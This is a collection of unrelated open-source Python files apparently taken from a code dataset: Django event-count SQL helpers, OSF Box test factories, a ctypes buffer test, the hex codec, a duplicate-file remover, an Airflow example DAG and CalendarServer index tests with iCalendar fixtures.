**condition_kwargs):
return self._call_survival_function(value, name, **condition_kwargs)
|
City-of-Helsinki/linkedevents
|
refs/heads/master
|
events/sql.py
|
1
|
from django.db import connection
def count_events_for_keywords(keyword_ids=(), all=False):
"""
Get the actual count of events using the given keywords.
:param keyword_ids: set of keyword ids
:type keyword_ids: Iterable[str]
:param all: count all keywords instead
:type all: bool
:return: dict of keyword id to count
:rtype: dict[str, int]
"""
# sorry for the non-DRY-ness; would be easier with an SQL generator like SQLAlchemy, but...
keyword_ids = tuple(set(keyword_ids))
with connection.cursor() as cursor:
if keyword_ids:
cursor.execute('''
SELECT t.keyword_id, COUNT(DISTINCT t.event_id)
FROM (
SELECT keyword_id, event_id FROM events_event_keywords WHERE keyword_id IN %s
UNION
SELECT keyword_id, event_id FROM events_event_audience WHERE keyword_id IN %s
) t
GROUP BY t.keyword_id;
''', [keyword_ids, keyword_ids])
elif all:
cursor.execute('''
SELECT t.keyword_id, COUNT(DISTINCT t.event_id)
FROM (
SELECT keyword_id, event_id FROM events_event_keywords
UNION
SELECT keyword_id, event_id FROM events_event_audience
) t
GROUP BY t.keyword_id;
''')
else:
return {}
return dict(cursor.fetchall())
def count_events_for_places(place_ids=(), all=False):
"""
Get the actual count of events in the given places.
:param place_ids: set of place ids
:type place_ids: Iterable[str]
:param all: count all places instead
:type all: bool
:return: dict of place id to count
:rtype: dict[str, int]
"""
# sorry for the non-DRY-ness; would be easier with an SQL generator like SQLAlchemy, but...
place_ids = tuple(set(place_ids))
with connection.cursor() as cursor:
if place_ids:
cursor.execute('''
SELECT e.location_id, COUNT(*)
FROM events_event e
WHERE location_id IN %s
GROUP BY e.location_id;
''', [place_ids])
elif all:
cursor.execute('''
SELECT e.location_id, COUNT(*)
FROM events_event e
GROUP BY e.location_id;
''')
else:
return {}
return dict(cursor.fetchall())
|
reinaH/osf.io
|
refs/heads/develop2
|
website/addons/box/tests/factories.py
|
23
|
# -*- coding: utf-8 -*-
"""Factory boy factories for the Box addon."""
import mock
from datetime import datetime
from framework.auth import Auth
from factory import SubFactory, Sequence, post_generation
from tests.factories import ModularOdmFactory, UserFactory, ProjectFactory
from website.addons.box.model import (
BoxOAuthSettings, BoxUserSettings,
BoxNodeSettings, BoxFile
)
# TODO(sloria): make an abstract UserSettingsFactory that just includes the owner field
class BoxOAuthSettingsFactory(ModularOdmFactory):
FACTORY_FOR = BoxOAuthSettings
username = 'Den'
user_id = 'b4rn311'
expires_at = datetime(2045, 1, 1)
access_token = Sequence(lambda n: 'abcdef{0}'.format(n))
refresh_token = Sequence(lambda n: 'abcdef{0}'.format(n))
class BoxUserSettingsFactory(ModularOdmFactory):
FACTORY_FOR = BoxUserSettings
owner = SubFactory(UserFactory)
oauth_settings = SubFactory(BoxOAuthSettingsFactory)
class BoxNodeSettingsFactory(ModularOdmFactory):
FACTORY_FOR = BoxNodeSettings
owner = SubFactory(ProjectFactory)
user_settings = SubFactory(BoxUserSettingsFactory)
with mock.patch('website.addons.box.model.BoxNodeSettings.fetch_folder_name') as mock_folder:
mock_folder.return_value = 'Camera Uploads'
class BoxFileFactory(ModularOdmFactory):
FACTORY_FOR = BoxFile
node = SubFactory(ProjectFactory)
path = 'foo.txt'
@post_generation
def add_box_addon(self, created, extracted):
self.node.add_addon('box', auth=Auth(user=self.node.creator))
self.node.save()
|
Belxjander/Kirito
|
refs/heads/master
|
Python-3.5.0-main/Lib/ctypes/test/test_frombuffer.py
|
14
|
from ctypes import *
import array
import gc
import unittest
class X(Structure):
_fields_ = [("c_int", c_int)]
init_called = False
def __init__(self):
self._init_called = True
class Test(unittest.TestCase):
def test_from_buffer(self):
a = array.array("i", range(16))
x = (c_int * 16).from_buffer(a)
y = X.from_buffer(a)
self.assertEqual(y.c_int, a[0])
self.assertFalse(y.init_called)
self.assertEqual(x[:], a.tolist())
a[0], a[-1] = 200, -200
self.assertEqual(x[:], a.tolist())
self.assertRaises(BufferError, a.append, 100)
self.assertRaises(BufferError, a.pop)
del x; del y; gc.collect(); gc.collect(); gc.collect()
a.append(100)
a.pop()
x = (c_int * 16).from_buffer(a)
self.assertIn(a, [obj.obj if isinstance(obj, memoryview) else obj
for obj in x._objects.values()])
expected = x[:]
del a; gc.collect(); gc.collect(); gc.collect()
self.assertEqual(x[:], expected)
with self.assertRaises(TypeError):
(c_char * 16).from_buffer(b"a" * 16)
with self.assertRaises(TypeError):
(c_char * 16).from_buffer("a" * 16)
def test_from_buffer_with_offset(self):
a = array.array("i", range(16))
x = (c_int * 15).from_buffer(a, sizeof(c_int))
self.assertEqual(x[:], a.tolist()[1:])
with self.assertRaises(ValueError):
c_int.from_buffer(a, -1)
with self.assertRaises(ValueError):
(c_int * 16).from_buffer(a, sizeof(c_int))
with self.assertRaises(ValueError):
(c_int * 1).from_buffer(a, 16 * sizeof(c_int))
def test_from_buffer_copy(self):
a = array.array("i", range(16))
x = (c_int * 16).from_buffer_copy(a)
y = X.from_buffer_copy(a)
self.assertEqual(y.c_int, a[0])
self.assertFalse(y.init_called)
self.assertEqual(x[:], list(range(16)))
a[0], a[-1] = 200, -200
self.assertEqual(x[:], list(range(16)))
a.append(100)
self.assertEqual(x[:], list(range(16)))
self.assertEqual(x._objects, None)
del a; gc.collect(); gc.collect(); gc.collect()
self.assertEqual(x[:], list(range(16)))
x = (c_char * 16).from_buffer_copy(b"a" * 16)
self.assertEqual(x[:], b"a" * 16)
with self.assertRaises(TypeError):
(c_char * 16).from_buffer_copy("a" * 16)
def test_from_buffer_copy_with_offset(self):
a = array.array("i", range(16))
x = (c_int * 15).from_buffer_copy(a, sizeof(c_int))
self.assertEqual(x[:], a.tolist()[1:])
with self.assertRaises(ValueError):
c_int.from_buffer_copy(a, -1)
with self.assertRaises(ValueError):
(c_int * 16).from_buffer_copy(a, sizeof(c_int))
with self.assertRaises(ValueError):
(c_int * 1).from_buffer_copy(a, 16 * sizeof(c_int))
if __name__ == '__main__':
unittest.main()
|
vFense/vFenseAgent-nix
|
refs/heads/development
|
agent/deps/rpm6/Python-2.7.5/lib/python2.7/encodings/hex_codec.py
|
528
|
""" Python 'hex_codec' Codec - 2-digit hex content transfer encoding
Unlike most of the other codecs which target Unicode, this codec
will return Python string objects for both encode and decode.
Written by Marc-Andre Lemburg (mal@lemburg.com).
"""
import codecs, binascii
### Codec APIs
def hex_encode(input,errors='strict'):
""" Encodes the object input and returns a tuple (output
object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.b2a_hex(input)
return (output, len(input))
def hex_decode(input,errors='strict'):
""" Decodes the object input and returns a tuple (output
object, length consumed).
input must be an object which provides the bf_getreadbuf
buffer slot. Python strings, buffer objects and memory
mapped files are examples of objects providing this slot.
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.a2b_hex(input)
return (output, len(input))
class Codec(codecs.Codec):
def encode(self, input,errors='strict'):
return hex_encode(input,errors)
def decode(self, input,errors='strict'):
return hex_decode(input,errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
assert self.errors == 'strict'
return binascii.b2a_hex(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
assert self.errors == 'strict'
return binascii.a2b_hex(input)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='hex',
encode=hex_encode,
decode=hex_decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
|
JussiSavola/dupefinder
|
refs/heads/master
|
dupekill.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# dupe killer - Jussi Savola 2017
#
# Usage: python dupekiller.py
#
# Disclaimer: If this breaks your files or your system, you can keep all the parts
import sqlite3
import os
import sys
import fnmatch
from os.path import join, getsize, exists
import hashlib
from stat import *
from sys import argv
import socket
def output_dupes(c):
c.execute("select md5sum, size, fullname from files where (md5sum) in "
"(select md5sum from files group by md5sum having count(*) > 1) order by md5sum")
rows = c.fetchall()
print rows
for row in rows:
print row
def get_list_of_nonmaster_copies(c):
a = c.execute("select fullname from files where md5sum in (select md5sum from files "
" group by md5sum, mastercopy having mastercopy = '1') and mastercopy != '1'")
rows = c.fetchall()
return rows
def main(argv):
if len(argv) > 1:
dbfile = argv[1]
else:
print ("give db filename as argument")
sys.exit(-1)
print ("db file name: ", dbfile)
if not exists(dbfile):
print ("give db filename as argument")
sys.exit(-2)
conn = sqlite3.connect(dbfile)
c = conn.cursor()
list = get_list_of_nonmaster_copies(c)
conn.close()
for entry in list:
try:
a = str(entry[0])
print ("about to remove " + a)
os.remove(a)
print ("... removed " + a)
# print ('would be erasing: ' + '"'+str(entry)+'"')
except:
print ("skipping: " + str(entry))
if __name__ == "__main__":
main(argv)
|
jgao54/airflow
|
refs/heads/master
|
airflow/example_dags/example_branch_operator.py
|
6
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import random
import airflow
from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import BranchPythonOperator
args = {
'owner': 'airflow',
'start_date': airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id='example_branch_operator',
default_args=args,
schedule_interval="@daily",
)
run_this_first = DummyOperator(
task_id='run_this_first',
dag=dag,
)
options = ['branch_a', 'branch_b', 'branch_c', 'branch_d']
branching = BranchPythonOperator(
task_id='branching',
python_callable=lambda: random.choice(options),
dag=dag,
)
run_this_first >> branching
join = DummyOperator(
task_id='join',
trigger_rule='one_success',
dag=dag,
)
for option in options:
t = DummyOperator(
task_id=option,
dag=dag,
)
dummy_follow = DummyOperator(
task_id='follow_' + option,
dag=dag,
)
branching >> t >> dummy_follow >> join
|
red-hood/calendarserver
|
refs/heads/trunk
|
txdav/caldav/datastore/test/test_index_file.py
|
1
|
##
# Copyright (c) 2010-2015 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.internet.task import deferLater
from txdav.caldav.datastore.index_file import Index, MemcachedUIDReserver
from txdav.caldav.datastore.query.filter import Filter
from txdav.common.icommondatastore import ReservationError, \
InternalDataStoreError
from twistedcaldav import caldavxml
from twistedcaldav.caldavxml import TimeRange
from twistedcaldav.ical import Component, InvalidICalendarDataError
from twistedcaldav.instance import InvalidOverriddenInstanceError
from twistedcaldav.test.util import InMemoryMemcacheProtocol
import twistedcaldav.test.util
from pycalendar.datetime import DateTime
import os
class MinimalCalendarObjectReplacement(object):
"""
Provide the minimal set of attributes and methods from CalDAVFile required
by L{Index}.
"""
def __init__(self, filePath):
self.fp = filePath
def iCalendar(self):
text = self.fp.open().read()
try:
component = Component.fromString(text)
# Fix any bogus data we can
component.validCalendarData()
component.validCalendarForCalDAV(methodAllowed=False)
except InvalidICalendarDataError, e:
raise InternalDataStoreError(
"File corruption detected (%s) in file: %s"
% (e, self._path.path)
)
return component
class MinimalResourceReplacement(object):
"""
Provide the minimal set of attributes and methods from CalDAVFile required
by L{Index}.
"""
def __init__(self, filePath):
self.fp = filePath
def isCalendarCollection(self):
return True
def getChild(self, name):
# FIXME: this should really return something with a child method
return MinimalCalendarObjectReplacement(self.fp.child(name))
def initSyncToken(self):
pass
class SQLIndexTests (twistedcaldav.test.util.TestCase):
"""
Test abstract SQL DB class
"""
def setUp(self):
super(SQLIndexTests, self).setUp()
self.site.resource.isCalendarCollection = lambda: True
self.indexDirPath = self.site.resource.fp
# FIXME: since this resource lies about isCalendarCollection, it doesn't
# have all the associated backend machinery to actually get children.
self.db = Index(MinimalResourceReplacement(self.indexDirPath))
def test_reserve_uid_ok(self):
uid = "test-test-test"
d = self.db.isReservedUID(uid)
d.addCallback(self.assertFalse)
d.addCallback(lambda _: self.db.reserveUID(uid))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertTrue)
d.addCallback(lambda _: self.db.unreserveUID(uid))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertFalse)
return d
def test_reserve_uid_twice(self):
uid = "test-test-test"
d = self.db.reserveUID(uid)
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertTrue)
d.addCallback(lambda _:
self.assertFailure(self.db.reserveUID(uid),
ReservationError))
return d
def test_unreserve_unreserved(self):
uid = "test-test-test"
return self.assertFailure(self.db.unreserveUID(uid),
ReservationError)
def test_reserve_uid_timeout(self):
# WARNING: This test is fundamentally flawed and will fail
# intermittently because it uses the real clock.
uid = "test-test-test"
from twistedcaldav.config import config
old_timeout = config.UIDReservationTimeOut
config.UIDReservationTimeOut = 1
def _finally():
config.UIDReservationTimeOut = old_timeout
d = self.db.isReservedUID(uid)
d.addCallback(self.assertFalse)
d.addCallback(lambda _: self.db.reserveUID(uid))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertTrue)
d.addCallback(lambda _: deferLater(reactor, 2, lambda: None))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertFalse)
self.addCleanup(_finally)
return d
def test_index(self):
data = (
(
"#1.1 Simple component",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
False,
True,
),
(
"#2.1 Recurring component",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
END:VCALENDAR
""",
False,
True,
),
(
"#2.2 Recurring component with override",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.2
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.2
RECURRENCE-ID:20080608T120000Z
DTSTART:20080608T120000Z
DTEND:20080608T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
False,
True,
),
(
"#2.3 Recurring component with broken override - new",
"2.3",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.3
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.3
RECURRENCE-ID:20080609T120000Z
DTSTART:20080608T120000Z
DTEND:20080608T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
False,
False,
),
(
"#2.4 Recurring component with broken override - existing",
"2.4",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.4
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.4
RECURRENCE-ID:20080609T120000Z
DTSTART:20080608T120000Z
DTEND:20080608T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
True,
True,
),
)
for description, name, calendar_txt, reCreate, ok in data:
calendar = Component.fromString(calendar_txt)
if ok:
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar, reCreate=reCreate)
self.assertTrue(self.db.resourceExists(name), msg=description)
else:
self.assertRaises(InvalidOverriddenInstanceError, self.db.addResource, name, calendar)
self.assertFalse(self.db.resourceExists(name), msg=description)
self.db._db_recreate()
for description, name, calendar_txt, reCreate, ok in data:
if ok:
self.assertTrue(self.db.resourceExists(name), msg=description)
else:
self.assertFalse(self.db.resourceExists(name), msg=description)
self.db.testAndUpdateIndex(DateTime(2020, 1, 1))
for description, name, calendar_txt, reCreate, ok in data:
if ok:
self.assertTrue(self.db.resourceExists(name), msg=description)
else:
self.assertFalse(self.db.resourceExists(name), msg=description)
@inlineCallbacks
def test_index_timerange(self):
"""
A plain (not freebusy) time range test.
"""
data = (
(
"#1.1 Simple component - busy",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
),
(
"#1.2 Simple component - transparent",
"1.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080602T120000Z
DTEND:20080602T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080602T000000Z", "20080603T000000Z",
),
(
"#1.3 Simple component - canceled",
"1.3",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.3
DTSTART:20080603T120000Z
DTEND:20080603T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:CANCELLED
END:VEVENT
END:VCALENDAR
""",
"20080603T000000Z", "20080604T000000Z",
),
(
"#1.4 Simple component - tentative",
"1.4",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.4
DTSTART:20080604T120000Z
DTEND:20080604T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:TENTATIVE
END:VEVENT
END:VCALENDAR
""",
"20080604T000000Z", "20080605T000000Z",
),
(
"#2.1 Recurring component - busy",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080605T120000Z
DTEND:20080605T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
END:VCALENDAR
""",
"20080605T000000Z", "20080607T000000Z",
),
(
"#2.2 Recurring component - busy",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.2
DTSTART:20080607T120000Z
DTEND:20080607T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.2
RECURRENCE-ID:20080608T120000Z
DTSTART:20080608T140000Z
DTEND:20080608T150000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080607T000000Z", "20080609T000000Z",
),
)
for description, name, calendar_txt, trstart, trend in data:
calendar = Component.fromString(calendar_txt)
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar)
self.assertTrue(self.db.resourceExists(name), msg=description)
# Create fake filter element to match time-range
filter = caldavxml.Filter(
caldavxml.ComponentFilter(
caldavxml.ComponentFilter(
TimeRange(
start=trstart,
end=trend,
),
name=("VEVENT", "VFREEBUSY", "VAVAILABILITY"),
),
name="VCALENDAR",
)
)
filter = Filter(filter)
resources = yield self.db.indexedSearch(filter)
index_results = set()
for found_name, _ignore_uid, _ignore_type in resources:
index_results.add(found_name)
self.assertEqual(set((name,)), index_results, msg=description)
@inlineCallbacks
def test_index_timespan(self):
data = (
(
"#1.1 Simple component - busy",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
(
"#1.2 Simple component - transparent",
"1.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080602T120000Z
DTEND:20080602T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080602T000000Z", "20080603T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'T'),),
),
(
"#1.3 Simple component - canceled",
"1.3",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.3
DTSTART:20080603T120000Z
DTEND:20080603T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:CANCELLED
END:VEVENT
END:VCALENDAR
""",
"20080603T000000Z", "20080604T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'F', 'F'),),
),
(
"#1.4 Simple component - tentative",
"1.4",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.4
DTSTART:20080604T120000Z
DTEND:20080604T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:TENTATIVE
END:VEVENT
END:VCALENDAR
""",
"20080604T000000Z", "20080605T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-04 12:00:00", "2008-06-04 13:00:00", 'T', 'F'),),
),
(
"#2.1 Recurring component - busy",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080605T120000Z
DTEND:20080605T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
END:VCALENDAR
""",
"20080605T000000Z", "20080607T000000Z",
"mailto:user1@example.com",
(
('N', "2008-06-05 12:00:00", "2008-06-05 13:00:00", 'B', 'F'),
('N', "2008-06-06 12:00:00", "2008-06-06 13:00:00", 'B', 'F'),
),
),
(
"#2.2 Recurring component - busy",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.2
DTSTART:20080607T120000Z
DTEND:20080607T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.2
RECURRENCE-ID:20080608T120000Z
DTSTART:20080608T140000Z
DTEND:20080608T150000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080607T000000Z", "20080609T000000Z",
"mailto:user1@example.com",
(
('N', "2008-06-07 12:00:00", "2008-06-07 13:00:00", 'B', 'F'),
('N', "2008-06-08 14:00:00", "2008-06-08 15:00:00", 'B', 'T'),
),
),
)
for description, name, calendar_txt, trstart, trend, organizer, instances in data:
calendar = Component.fromString(calendar_txt)
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar)
self.assertTrue(self.db.resourceExists(name), msg=description)
# Create fake filter element to match time-range
filter = caldavxml.Filter(
caldavxml.ComponentFilter(
caldavxml.ComponentFilter(
TimeRange(
start=trstart,
end=trend,
),
name=("VEVENT", "VFREEBUSY", "VAVAILABILITY"),
),
name="VCALENDAR",
)
)
filter = Filter(filter)
resources = yield self.db.indexedSearch(filter, fbtype=True)
index_results = set()
for _ignore_name, _ignore_uid, type, test_organizer, float, start, end, fbtype, transp in resources:
self.assertEqual(test_organizer, organizer, msg=description)
index_results.add((float, start, end, fbtype, transp,))
self.assertEqual(set(instances), index_results, msg=description)
@inlineCallbacks
def test_index_timespan_per_user(self):
data = (
(
"#1.1 Single per-user non-recurring component",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.1
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),),
),
(
"user02",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
),
),
(
"#1.2 Two per-user non-recurring component",
"1.2",
"""BEGIN:VCALENDAR
VERSION:2.0
